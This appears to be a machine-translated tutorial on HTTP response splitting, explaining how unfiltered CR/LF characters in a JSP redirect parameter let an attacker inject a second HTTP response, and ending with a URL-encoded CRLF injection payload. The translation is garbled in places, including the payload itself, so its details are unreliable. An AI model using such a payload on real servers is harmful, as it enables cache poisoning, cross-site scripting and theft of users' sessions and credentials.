Basic Principles of http response splitting attack

Translation: <-> principle overview http Response Header truncation is a new attack technology derived from many attack methods: web cache configuroning, cross user defacement, cross-site scripting. Attackers can exploit this vulnerability to obtain sensitive user information and even authentication information containing user names and passwords. This attack may exist in many environments, such as Microsoft ASP, asp net, ibm websphere, popular servers, apache, squid, in addition, the main cause of http Response Header truncation vulnerability caused by browser IE6.0 SP1. is that illegal characters submitted by users are not strictly filtered, especially CR and LF characters. By sending a specially crafted request, attackers force the server to think that the returned data is two responses instead of a conventional response. When the second response can be fully controlled through A crafted request, the attack can be implemented by sending two requests A and B. A request contains the constructed data, which causes the server to return two responses, R1 and R2. R2 can be fully controlled by the elaborate structure in. The server returns R1 to A as response, while R2 is returned to B as the server's response even if R2 is not generated by the server itself ). Request A -------------> Web Server (R1, R2) Request B -------------> Web Server (Supposed To Be R3) Web Server (R1) ------------> A Web Server (R2) ------> B <2> basic technology: http Response Header truncation attacks focus on the ability to input data in the http header and construct special characters for truncation. The most likely is in the Location field and in the Set-Cookie field. Instance: page/redir_lang.jsp <% Response. sendRedirect ("/by_lang.jsp? Lang = "+ request. getParameter (" lang "); %> when the english language is submitted as a parameter, it is transferred to/by_lang.jsp? Lang = english, the general response is as follows: HTTP/1.1 302 Moved Temporarily Date: Wed, 24 Dec 2003 12:53:28 Location: http://10.1.1.1/by_lang.jsp?lang=english Server: WebLogic XMLX Module 8.1 SP1 Fir Jun 20 23:06:40 PDT 2003 271009 with Content-Type: text/html Set-Cookie: JSESSIONID = 1PMRZOIQQzZIE6iivsREG82pq9B017h4YoHZ62RXjApqwBE! -12510119693; path =/Connection: Close ............................ From the preceding figure, we can see that the input parameters have been submitted to the http header, so that we can construct a special character to intercept the http header, then, append a self-constructed header:/redir_lang.jsp? Lang = foobar % 0d % 0aContent-Length: % 200% 0d % 0a % 0d % oaHTTP/1.1% 20200% 20OK % 0d % 0aContent-Type: % 20 text/html % 0d % 0a % Content-Length: % 2019% 0d % 0a % 0d % 0a